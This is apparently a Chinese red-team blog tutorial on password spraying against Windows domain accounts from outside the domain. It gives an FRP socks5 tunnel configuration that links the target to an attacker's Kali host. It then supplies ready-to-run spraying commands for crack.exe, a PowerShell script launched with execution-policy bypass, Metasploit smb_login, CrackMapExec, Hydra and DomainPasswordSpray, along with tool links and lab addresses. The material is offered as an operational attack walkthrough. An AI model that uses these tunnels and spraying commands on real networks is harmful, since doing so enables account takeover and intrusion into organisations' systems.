内网渗透之横向移动 -- 从域外向域内进行密码喷洒攻击

**欢迎关注我的微信公众号《壳中之魂》**

密码喷洒攻击属于一种自动化攻击的方式，为了避免只针对一个用户进行密码爆破而造成账户锁定，密码喷洒攻击是对所有用户进行爆破，既避免了用户被锁定，同时也提高了用户破解密码的效率。同时，不同于固定用户名对密码进行爆破，密码喷洒攻击是固定密码对用户名进行爆破。

建立通信隧道

⼀般我们红队⼈员与⽬标内⽹建⽴了 socks5 隧道后，就可以从域外（这⾥指的是红队⼈员的个⼈ PC）对域内机器进⾏信息搜集了，很多⼯具不⽤上传到⽬标机器，也就不易被 AV 检测到，但是有可能会被⼀些流量检测设备发现有⼤量 socks5 流量

使用Proxifier和FRP进行socks5隧道的建立

首先现在攻击机kali建立监听隧道

[common]
bind_port = 7000 

然后在目标机也开启frpc，并且连接到kali，同时开启socks5服务

[common]
server_addr = 192.168.137.93    //kali的IP
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

最后使用攻击机win7，通过proxifier连接socks5

crack 对域内进⾏密码喷洒（找不到下载链接）

crack 是⼀款⾮常好⽤的密码喷洒⼯具，并且速度快，⽀持对⼀个 C、 B 段进⾏基于 smb 密码喷洒。命令语法

基于单个⽤户单个密码喷洒
crack.exe -i 10.10.10.10/24 -p 445 -U redteam\saulgoodman -P Saul!@#45 -s smb -t 100
基于⽤户字典密码字典喷洒
crack.exe -i 10.10.10.10/24 -p 445 -U user.txt -P pass.txt -s smb -t 100

喷洒成功会在当前路径下⽣成⼀个 result.txt ⽂件，⾥⾯就是喷洒成功的结果

Invoke-DomainPasswordSprayOutsideTheDomain（对域内进⾏密码喷洒）

Invoke-DomainPasswordSprayOutsideTheDomain 这个脚本是 3gstudent 写的⼀个脚本。

下载地址： https://github.com/3gstudent/Homework-of-Powershell

使⽤单个密码

powershell -exec bypass
Import-Module .\Invoke-DomainPasswordSprayOutsideTheDomain.ps1
Invoke-DomainPasswordSprayOutsideTheDomain -UserList users.txt -Domain "10.10.10.10/DC=redteam,DC=com" -Password admin!@#45

使⽤密码⽂件

Invoke-DomainPasswordSprayOutsideTheDomain -UserList users.txt -Domain "10.10.10.10/DC=redteam,DC=com" -Password admin!@#45 

这⾥建议使⽤单个密码来进⾏密码喷洒，如果是⼀个密码字典的话有可能会报错

使用msf进行密码喷洒

首先要配置代理

setg proxies socks5:192.168.137.54:7777
setg ReverseAllowProxy true

使用模块

scanner/smb/smb_login 

可以配置文件字典爆破

set user_file /root/users.txt
set pass_file /root/pass.txt

如果是对域进行爆破要设置域

set smbdomain redteam 

如果是对工作组进行爆破

set smbdomain . 

然而我这边一直显示无法连接不知道为什么

超级弱⼝令⼯具对域内进⾏密码喷洒

超级弱⼝令检查⼯具是⼀款Windows平台的弱⼝令审计⼯具，⽀持批量多线程检查，可快速发现弱密码、弱⼝令账号，密码⽀持和⽤户名结合进⾏检查，⼤⼤提⾼成功率，⽀持⾃定义服务端⼝和字典。 ⼯具采⽤C#开发，需要安装.NET Framework 4.0，⼯具⽬前⽀持SSH、 RDP、 SMB、 MySQL、 SQLServer、 Oracle、 FTP、 MongoDB、Memcached、 PostgreSQL、 Telnet、 SMTP、 SMTP_SSL、 POP3、 POP3_SSL、 IMAP、 IMAP_SSL、 SVN、VNC、 Redis等服务的弱⼝令检查⼯作。

下载地址： https://github.com/shack2/SNETCracker

CrackMapExec 对域内进⾏密码喷洒

CrackMapExec（⼜名 CME）是⼀款⾮常好⽤的密码喷洒攻击的⼯具，在 Kali Linux 默认已经安装好。

下载地址： https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb 10.10.10.12 -u users.txt -p 'admin!@#45' --continue-on-success 

Hydra 对域内进⾏密码喷洒

Hydra 是最著名的暴⼒破解⼯具之⼀，我将在这⾥针对 SMB 协议，但这款⼯具⼏乎可以使⽤任何其他协议来完成密码喷洒

hydra -L users.txt -p admin!@#45 10.10.10.12 smb 

使用DomainPasswordSpray

工具地址：https://github.com/dafthack/DomainPasswordSpray

DomainPasswordSpray 是用 PowerShell 编写的工具，用于对域用户执行密码喷洒攻击。默认情况下，它将利用 LDAP 从域中导出用户列表，然后扣掉被锁定的用户，再用固定密码进行密码喷洒。

先从powershell导入脚本，然后再运行

可以看到运行结果

当然我们可以以字典的形式进行爆破

Invoke-DomainPasswordSpray -UserList users.txt -Domain g1ts.com -PasswordList passlist.txt -OutFile sprayed-creds.txt 

• UserList：用户字典
• Password：单个密码
• PasswordList：密码字典
• OutFile：输出的文件名
• Domain：要爆破的域
• Force：强制喷洒继续，而不提示确认。